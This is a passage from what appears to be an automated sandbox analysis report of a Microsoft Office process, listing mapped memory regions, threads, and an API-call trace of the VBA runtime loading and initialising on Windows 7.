0x7fef5080000 end_va = 0x7fef5082fff entry_point = 0x7fef5080000 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_en.dub") Region: id = 1076 start_va = 0x7fef74d0000 end_va = 0x7fef7533fff entry_point = 0x7fef74d0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1077 start_va = 0x7fef7540000 end_va = 0x7fef75b0fff entry_point = 0x7fef7540000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1078 start_va = 0x7fefaa40000 end_va = 0x7fefaa57fff entry_point = 0x7fefaa40000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1079 start_va = 0x7fefaa60000 end_va = 0x7fefaa70fff entry_point = 0x7fefaa60000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1080 start_va = 0x7fefabe0000 end_va = 0x7fefabeafff entry_point = 0x7fefabe0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1081 start_va = 0x7fefabf0000 end_va = 0x7fefac16fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1082 start_va = 0x7fefc4d0000 end_va = 0x7fefc4d9fff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1083 start_va = 0x7fefc870000 end_va = 0x7fefc8c4fff entry_point = 0x7fefc870000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1084 start_va = 0x4100000 end_va = 0x4101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004100000" filename = "" Region: id = 1085 start_va = 0x4310000 end_va = 0x431bfff entry_point = 0x4310000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1086 start_va = 0x44e0000 end_va = 0x44e7fff entry_point = 0x44e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1087 start_va = 0x44f0000 end_va = 0x44fffff entry_point = 0x44f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1088 start_va = 0xa700000 end_va = 0xaa42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a700000" filename = "" Region: id = 1089 start_va = 0x7fefc270000 end_va = 0x7fefc276fff entry_point = 0x7fefc270000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1090 start_va = 0x7fefc6f0000 end_va = 0x7fefc74afff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1091 start_va = 0x7fefc860000 end_va = 0x7fefc866fff entry_point = 0x7fefc860000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1092 start_va = 0x8c50000 end_va = 0x8ccffff entry_point = 0x0 region_type = private name = "private_0x0000000008c50000" filename = "" Region: id = 1093 start_va = 0x7fef2be0000 end_va = 0x7fef2c41fff entry_point = 0x7fef2be0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1094 start_va = 0x7fefa430000 end_va = 0x7fefa44bfff entry_point = 0x7fefa430000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1095 start_va = 0x7fefa650000 end_va = 0x7fefa660fff entry_point = 0x7fefa650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1096 start_va = 0x4da0000 end_va = 0x4da0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 1097 start_va = 0x7fef52f0000 end_va = 0x7fef52f8fff entry_point = 0x7fef52f0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1098 start_va = 0x9c20000 end_va = 0x9c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c20000" filename = "" Region: id = 1099 start_va = 0xf2f0000 end_va = 0xf3effff entry_point = 0x0 region_type = private name = "private_0x000000000f2f0000" filename = "" Region: id = 1100 start_va = 0xf490000 end_va = 0xf58ffff entry_point = 0x0 region_type = private name = "private_0x000000000f490000" filename = "" Region: id = 1101 start_va = 0x7fef5300000 end_va = 0x7fef5307fff entry_point = 0x7fef5300000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1102 start_va = 0x7fefb300000 end_va = 0x7fefb314fff entry_point = 0x7fefb300000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1103 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1104 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1105 start_va = 0x7fefb2e0000 end_va = 0x7fefb2f8fff entry_point = 0x7fefb2e0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1106 start_va = 0x7fefb2d0000 end_va = 0x7fefb2dafff entry_point = 0x7fefb2d0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1107 start_va = 0x7fefaa90000 end_va = 0x7fefaae2fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1108 start_va = 0x4db0000 end_va = 0x4db1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 1109 start_va = 0x4e60000 end_va = 0x4e61fff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 1110 start_va = 0x5060000 end_va = 0x5061fff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1111 start_va = 0x50a0000 end_va = 0x50a1fff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 1112 start_va = 0x50d0000 end_va = 0x50d1fff entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 1113 start_va = 0x5100000 end_va = 0x5101fff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1114 start_va = 0x5130000 end_va = 0x5131fff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 1115 start_va = 0x5160000 end_va = 0x5161fff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 1116 start_va = 0x51c0000 end_va = 0x51c1fff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 1117 start_va = 0x51e0000 end_va = 0x51e1fff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 1118 start_va = 0x9b80000 end_va = 0x9bfffff entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 1119 start_va = 0xf660000 end_va = 0xf75ffff entry_point = 0x0 region_type = private name = "private_0x000000000f660000" filename = "" Region: id = 1120 start_va = 0xf7d0000 end_va = 0xf8cffff entry_point = 0x0 region_type = private name = "private_0x000000000f7d0000" filename = "" Region: id = 1121 start_va = 0xf8d0000 end_va = 0xfa57fff entry_point = 0xf8d0000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex") Region: id = 1122 start_va = 0x7fee1710000 end_va = 0x7fee1c6bfff entry_point = 0x7fee1710000 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nl7models0009.dll") Region: id = 1123 start_va = 0x7fee30b0000 end_va = 0x7fee3149fff entry_point = 0x7fee30b0000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\css7data0009.dll") Region: id = 1124 start_va = 0x7fee3150000 end_va = 0x7fee32d7fff entry_point = 0x7fee3150000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex") Region: id = 1125 start_va = 0x7fee32e0000 end_va = 0x7fee33acfff entry_point = 0x7fee32e0000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msspell7.dll") Region: id = 1126 start_va = 0x7fee33e0000 end_va = 0x7fee3475fff entry_point = 0x7fee33e0000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7en.dll") Region: id = 1127 start_va = 0x7feee760000 end_va = 0x7feee77afff entry_point = 0x7feee760000 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_en.dub") Region: id = 1128 start_va = 0x7fef4840000 end_va = 0x7fef495efff entry_point = 0x7fef4840000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 1129 start_va = 0x7fef5070000 end_va = 0x7fef5072fff entry_point = 0x7fef5070000 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_en.dub") Region: id = 1130 start_va = 0x7fefc360000 end_va = 0x7fefc37afff entry_point = 0x7fefc360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1131 start_va = 0x7fefc660000 end_va = 0x7fefc6b6fff entry_point = 0x7fefc660000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1132 start_va = 0x7fefca70000 end_va = 0x7fefcabdfff entry_point = 0x7fefca70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1133 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1134 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 2534 start_va = 0x4110000 end_va = 0x4111fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2535 start_va = 0x4390000 end_va = 0x4391fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 2536 start_va = 0x4510000 end_va = 0x4511fff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 2537 start_va = 0x4e70000 end_va = 0x4e71fff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 2538 start_va = 0x5080000 end_va = 0x5081fff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 2539 start_va = 0x50b0000 end_va = 0x50b1fff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 2540 start_va = 0x50e0000 end_va = 0x50e1fff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 2541 start_va = 0x5110000 end_va = 0x5111fff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2542 start_va = 0x5140000 end_va = 0x5141fff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2543 start_va = 0x5170000 end_va = 0x5171fff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2544 start_va = 0x51f0000 end_va = 0x5221fff entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 2545 start_va = 0xf630000 end_va = 0xf72ffff entry_point = 0x0 region_type = private name = "private_0x000000000f630000" filename = "" Region: id = 2546 start_va = 0x7fef5290000 end_va = 0x7fef529cfff entry_point = 0x7fef5290000 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wordcnvpxy.cnv") Region: id = 2547 start_va = 0x7fef51e0000 end_va = 0x7fef5206fff entry_point = 0x7fef51e0000 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\msconv97.dll") Region: id = 2548 start_va = 0x7fef5290000 end_va = 0x7fef529efff entry_point = 0x7fef5290000 region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\RECOVR32.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 2549 start_va = 0x7fef51d0000 end_va = 0x7fef5208fff entry_point = 0x7fef51d0000 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 2550 start_va = 0x7fef51c0000 end_va = 0x7fef520efff entry_point = 0x7fef51c0000 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 2551 start_va = 0x5050000 end_va = 0x5063fff entry_point = 0x5050000 region_type = mapped_file name = "msxml6r.dll.mui" filename = "\\Windows\\System32\\en-US\\msxml6r.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msxml6r.dll.mui") Region: id = 2552 start_va = 0xf8d0000 end_va = 0xfbd7fff entry_point = 0x0 region_type = private name = "private_0x000000000f8d0000" filename = "" Region: id = 2553 start_va = 0xfbe0000 end_va = 0xfde8fff entry_point = 0x0 region_type = private name = "private_0x000000000fbe0000" filename = "" Region: id = 2554 start_va = 0xfdf0000 end_va = 0xfff9fff entry_point = 0x0 region_type = private name = "private_0x000000000fdf0000" filename = "" Region: id = 2555 start_va = 0x10000000 end_va = 0x10208fff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 2556 start_va = 0xcec0000 end_va = 0xcfbffff entry_point = 0x0 region_type = private name = "private_0x000000000cec0000" filename = "" Region: id = 2557 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Thread: id = 1 os_tid = 0x9dc Thread: id = 2 os_tid = 0x9d8 Thread: id = 3 os_tid = 0x9d4 Thread: id = 4 os_tid = 0x9d0 Thread: id = 5 os_tid = 0x9cc Thread: id = 6 os_tid = 0x9c8 Thread: id = 7 os_tid = 0x9c0 Thread: id = 8 os_tid = 0x9ac Thread: id = 9 os_tid = 0x99c Thread: id = 10 os_tid = 0x994 Thread: id = 11 os_tid = 0x990 Thread: id = 12 os_tid = 0x958 [0016.407] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0016.407] SetCursor (hCursor=0x10007) returned 0x10007 [0016.407] _set_invalid_parameter_handler (_Handler=0x7fef0ca10c8) returned 0x0 [0016.407] wcscpy_s (in: _Destination=0x7556d98, _SizeInWords=0xb, _Source="7.1\\" | out: _Destination="7.1\\") returned 0x0 [0016.407] GetACP () returned 0x4e4 [0016.477] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName=0x7fef1048f60, phModule=0x7fef106f848 | out: phModule=0x7fef106f848*=0x7fef8cd0000) returned 1 [0016.477] GetProcAddress (hModule=0x7fef8cd0000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fef8d53b3c [0016.478] GetProcAddress (hModule=0x7fef8cd0000, lpProcName="MsiGetProductCodeA") returned 0x7fef8d4a13c [0016.478] GetProcAddress (hModule=0x7fef8cd0000, lpProcName="MsiReinstallFeatureA") returned 0x7fef8d51618 [0016.478] GetProcAddress (hModule=0x7fef8cd0000, lpProcName="MsiProvideComponentA") returned 0x7fef8d4f088 [0016.491] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0016.491] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0016.491] lstrcpyW (in: lpString1=0x287600, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0016.491] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0016.829] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee3560000 [0016.858] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10012c0e00000113) returned 1 [0016.859] RegisterClipboardFormatA (lpszFormat="VBM_FHwndIsHctl") returned 0xc193 [0016.859] lstrlenA (lpString="") returned 0 [0016.859] lstrcpyA (in: lpString1=0xa392630, lpString2="" | out: lpString1="") returned="" [0016.859] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x2875e0, nSize=0x118 | out: lpBuffer="¯\x01") returned 0x0 [0016.859] SetErrorMode (uMode=0x8001) returned 0x8001 [0016.859] GetModuleFileNameA (in: hModule=0x7fef0ca0000, lpFilename=0x2872f0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0016.859] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.859] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.860] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.860] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.860] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.860] lstrcpyA (in: lpString1=0x2871e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0016.860] strcpy_s (in: _Dst=0x287400, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0016.860] _ultoa_s (in: _Val=0x409, _DstBuf=0x286f60, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0016.860] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0016.860] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0016.860] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0016.860] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0016.860] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x286e10, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0016.860] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0016.860] strcpy_s (in: _Dst=0x287090, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0016.861] GetSystemDefaultLCID () returned 0x409 [0016.861] GetUserDefaultLCID () returned 0x409 [0016.861] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x287720, cchData=2 | out: lpLCData=".") returned 2 [0016.861] GetStockObject (i=13) returned 0x18a002e [0016.861] GetObjectA (in: h=0x18a002e, c=60, pv=0x2876c0 | out: pv=0x2876c0) returned 60 [0016.861] lstrcpyA (in: lpString1=0x7fef1070150, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0016.861] lstrcpyA (in: lpString1=0x7fef1071470, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0016.862] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0016.862] lstrcpyA (in: lpString1=0xa3ac4e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0016.862] GetVersionExA (in: lpVersionInformation=0x287650*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x287650*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0016.862] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x287578 | out: phkResult=0x287578*=0x986) returned 0x0 [0016.862] strcpy_s (in: _Dst=0x287580, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0016.862] strcpy_s (in: _Dst=0x287600, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0016.862] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0016.862] RegQueryValueA (in: hKey=0x986, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x287600, lpcbData=0x287570 | out: lpData="\x0f}\x02\x01", lpcbData=0x287570) returned 0x2 [0016.863] RegCloseKey (hKey=0x986) returned 0x0 [0016.863] OleInitialize (pvReserved=0x0) returned 0x1 [0016.863] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0016.863] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0016.863] GetClassInfoA (in: hInstance=0x7fef0ca0000, lpClassName="VBBubble", lpWndClass=0x2876b0 | out: lpWndClass=0x2876b0) returned 0 [0016.863] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0016.863] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0016.863] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0016.863] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0016.863] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0016.863] GlobalAddAtomA (lpString="VBDisabled") returned 0x1f30160c110 [0016.864] RegisterClassExA (param_1=0x2877d0) returned 0x1f60054c195 [0016.864] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10012c0e00000117) returned 1 [0016.864] GetVersionExA (in: lpVersionInformation=0x2875c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2875c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0016.866] GetModuleHandleA (lpModuleName="USER32") returned 0x76e70000 [0016.866] GetProcAddress (hModule=0x76e70000, lpProcName="GetSystemMetrics") returned 0x76e894f0 